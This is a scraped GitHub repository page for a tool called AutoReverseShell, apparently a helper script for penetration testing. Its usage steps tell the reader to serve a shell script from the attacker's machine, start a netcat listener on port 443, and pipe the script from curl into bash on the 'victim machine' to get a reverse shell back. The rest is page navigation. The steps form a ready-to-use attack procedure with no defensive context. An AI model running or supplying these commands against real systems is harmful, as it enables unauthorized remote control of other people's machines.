- Download rshells.sh on the attacker's machine:
wget https://raw.githubusercontent.com/dherrera98/AutoReverseShell/main/rshells.sh - Serve it with a web server, for example:
python3 -m http.server 80 - Run netcat in another terminal to listen on some port, for example port 443:
nc -nlvp 443 - On the victim machine run:
curl http://<IpWebServer>:<PortWebServer>/rshell.sh | bash -s <AttackerIP> <NetcatPort> - Look at the netcat terminal and you will see the shell of the victim.
-
Notifications
You must be signed in to change notification settings - Fork 2
Shac0x/AutoReverseShell
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Β | Β | |||
Β | Β | |||
Repository files navigation
About
No description, website, or topics provided.
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published